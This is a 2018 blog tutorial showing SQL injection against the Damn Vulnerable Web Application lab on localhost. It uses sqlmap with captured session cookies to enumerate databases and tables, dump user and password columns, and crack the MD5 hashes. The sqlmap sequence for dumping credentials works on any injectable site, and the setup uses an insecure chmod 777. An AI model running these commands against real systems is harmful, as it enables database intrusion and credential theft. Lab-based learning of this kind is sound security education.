Ads

Tuesday, 5 June 2018

How To Perform SQL Injection


In this tutorial, we will be going to learn a new thing that is SQL injection. Today still many sites are vulnerable to SQL injection attack, that causes to steal the database usernames passwords, credit card details and other important details. An SQL injection occurs when the input is not filtered properly so the attacker uses different SQL commands to manipulate the database. Today we will look at an example of SQL injection on Damn Vulnerable Web Application, that is made for testing several vulnerabilities. So, Let’s start.


What You Need

To test the SQL injection you may need the following tools:
Xampp Server (If You Have Kali Installed You Don’t need Any)
DVWA LAB
Kali Linux OS

DVWA Installation

First Of all, you need to install DVWA application in Kali. You can download it from here:

Now copy the folder to /var/www/html directory and start both server services that is apache and mysql  I will rename the folder to master so we can locate it easily:



Now let’s start the two services. Type in the following command in the terminal:
service apache2 start(To Start Apache)
service mysql start(To Start Mysql)


Now Open The Firefox browser and locate to localhost/master path.



You can see that its saying permission denied. So, we need to give root permission to open it. Type in the following command to give it root permission.
Chmod –R 777 /var/www/html/master


The Green highlighter shows that it's now available to the public:
Now let’s locate the localhost/master path again:



Now you can see we have successfully accessed its file but still a problem its asking to change the config/config.php to config/config.php file. So, let’s do it.



Now, let’s move back and check again.



Now You can see that we have successfully accessed the DVWA application. Now its time to setup database. If you are a root user you cannot create a database for DVWA. In MariaDB, we cannot create a database for DVWA.



So, we will create a database and give all permissions to it.
To Create a new database type in the following commands:
Mysql> create database dvwaa;
Mysql> grant all on dvwaa. * to dvwaa@localhost identified by ‘xxx’;
Mysql> flush privileges;
And change the new database credential in the following file

/var/www/html/master/config/config.inc.php

Now let’s go back and try creating the database:





You can see that we are able to connect the database. Now let’s log in and test for SQL vulnerability. The default credentials for logging in are admin and password:
Now we will set the DVWA security level to low and test for vulnerability:
After setting the security level to low we will test the SQL injection.
Enter anything in the User ID field and click submit and copy the URL.



Now we need to capture the cookies for our session. You can use burp suit to capture cookies.



Now open up the terminal and type in the following command to test for SQL injection vulnerability:
Sqlmap –u “URL” –cookie=”cookies”


After running the tests we found that the following URL is vulnerable to SQL injection.



Now we will use the following command to see what’s in the database just put –dbs at the end of above command:
Sqlmap –u “URL” –cookie=”cookies” –dbs

Now you can see that we found two databases. Now we will list the tables of the dvwa database: Type in the following command:
Sqlmap –u “URL” –cookie=”cookies” –D dvwaa –tables

You can see that we found two tables for the database dvwaa.
Now we will list columns of users on dvwaa database:
Sqlmap –u “URL” –cookie=”cookies” –D dvwaa –T users --columns


You can see that we found the above columns on the database dvwaa.
Now let’s dump the user column. Type in the following command:
Sqlmap –u “URL” –cookie=”cookies” –D dvwaa –T users –C user –dump

We have successfully dumped the user columns.
Now we will dump the passwords from the database. Type in the following command:
Sqlmap –u “URL” –cookie=”cookies” –D dvwaa –T users –C password

Now you can see that we have successfully dumped the passwords in encrypted form.
We will try to decrypt them using one of the Kali Linux Tools.
First of all, we need to identify the type of hash. There is a tool in Kali Linux that we will use to identify the hash type.  We will use hash-identifier tool to identify the hash type:


Type the following command to identify the hash type:
hash-identifier [hash]

It is showing that the hash is MD5. Now we need to decrypt the hash We will use online md5 hash decrypter tool.
https://www.md5online.org

Here You can see the result the original password is letmein.
Thanks for watching the tutorial.

Keywords:

sql injection
vulnerable
sql injection example
sql injection cheat sheet
ql injection attack
blind sql injection
how to do sql injection
sqlmap
NEXT ARTICLE Next Post
PREVIOUS ARTICLE Previous Post
NEXT ARTICLE Next Post
PREVIOUS ARTICLE Previous Post
 

Delivered by FeedBurner